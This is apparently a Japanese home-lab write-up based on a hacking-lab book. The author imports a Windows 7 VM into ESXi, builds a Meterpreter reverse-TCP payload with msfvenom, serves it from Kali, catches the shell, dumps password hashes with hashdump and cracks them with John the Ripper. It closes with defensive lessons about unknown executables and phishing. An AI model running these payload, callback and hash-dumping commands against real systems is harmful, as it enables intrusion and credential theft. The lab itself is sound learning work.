参考文献:IPUSIRON著「ハッキング・ラボのつくりかた」
ではVirtualBOXを使用していましたが、私の環境はESXi6.5なので
ESXiにWin7のイメージをインポートしてみました。
1.環境
Kali Linux:192.168.0.15
Windows7(IE8)64bit:192.168.0.26
2.手順
2-1.Windows7の準備
下記URLよりWin7のイメージをダウンロード
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
IE8 on Win7(x86)
VMware(Windows,Mac)
を選択してダウンロード
ESXi6.5にてOVFのインポートをしようとすると、
下記のようなエラーが出てインポートできません。


対策として、
IE8-Win7-VMWare.ovf をテキストエディタで開いて、下記を削除
<Item>
<rasd:Address>0</rasd:Address>
<rasd:Description>SATA Controller</rasd:Description>
<rasd:ElementName>sataController0</rasd:ElementName>
<rasd:InstanceID>3</rasd:InstanceID>
<rasd:ResourceSubType>vmware.sata.ahci</rasd:ResourceSubType>
<rasd:ResourceType>20</rasd:ResourceType>
</Item>
IE8-Win7-VMWare.mf もテキストエディタで開いて、下記を削除
SHA256(IE8-Win7-VMWare.ovf)= a432628ee757c4329b908802c8b16c9e8a8df0b8a236288cef9e9c5fdc80660d


インポート成功です。
操作しずらいので、VMwareToolsをインストールしておきます。
書籍「ハッキングラボのつくりかた」に従い、
IPアドレス設定
WindowsUPdateの無効化
Windowsファイウォール設定(ping)
日本語キーボードドライバの適用
言語設定
を行います。
追加で、
時刻設定
リモートデスクトップ設定
Administratorアカウントの有効化(パスワードはPassw0rd!です)
も行います。
アカウント名:IEUser
パスワード:Passw0rd!
でRDP接続します。
Sysinternals Suite
https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
Sysinternals Suiteを上記URLからダウンロードして、
RDPでWin7にアップロードして、zipを展開します。
64bitマシンなので、
Autoruns64.exe
を実行して、Everythingタブを表示。
File>Saveでautorun_baseline_yyyymmdd.arn
として初期状態を保存しておきます。
また、ESXiでスナップショットも取得しておきます。
2-2.MetasplitとJohn The Ripperの操作
Metasploitの起動
msfconsole
show exploits
search type:payload reverse_tcp platform:windows
8 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection),
Reverse TCP Stager
55 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64),
Windows x64 Reverse TCP Stager
で2種類ありますが、対象が64bitなのでx64の方を使用します。
evil64.exeの作成
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.15 -f exe -o /root/evil64.exe
cd /var/www/html
mkdir share
cp /root/evil64.exe share
chmod -R 755 share
service apache2 restart
Windows側から下記にアクセス
http://192.168.0.15/share/
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.15
↑KaliのIPを指定します。
show options
LPORT 4444なのでport4444で待ち受けることがわかります。
exploit
Windows7側の操作
http://192.168.0.15/share/ にアクセスして、evll.exeをダウンロードして、Wクリックする。
Kali側でWindowsの操作ができるようになります。
Windowsのパスワードハッシュの取得
getuid
getsystem -t 1
getuid
run hashdump
run post/windows/gather/smart_hashdump GETSYSTEM=true
/root/.msf4/loot/20210101060733_default_192.168.0.26_windows.hashes_689472.txt
に出力されます。
exit
exit
cp -p /root/.msf4/loot/20210101060733_default_192.168.0.26_windows.hashes_689472.txt /root/hash_win7.txt
vi /usr/share/john/password.lst
Passw0rd!
を追記
john --wordlist=/usr/share/john/password.lst --format:NT hash_win7.txt
john --show --format:NT hash_win7.txt
見事にパスワードが取得できました。
失敗したときに前の情報を消すには、
rm /root/.john/john.pot
して下さい。

3.まとめ
書籍と少し違ってUUAC関連の操作は必要ありませんでしたが、
Win7でのパスワード解析は成功できました。
不明なEXEファイルをクリックしてしまう危険性が理解できました。
ルータやFWを挟んでいるから大丈夫じゃないんですね。
複数回パスワード誤りによるアカウントロックの設定や定期的なパスワード変更もバックドアが仕掛けられれば焼石に水と知りました。
危険なサイトのURLへのアクセス制限やフィッシングメール対策の方が防御の効果が大きいのではと感じました。
IPUSIRON著「ハッキング・ラボのつくりかた」の学習を進めていきます。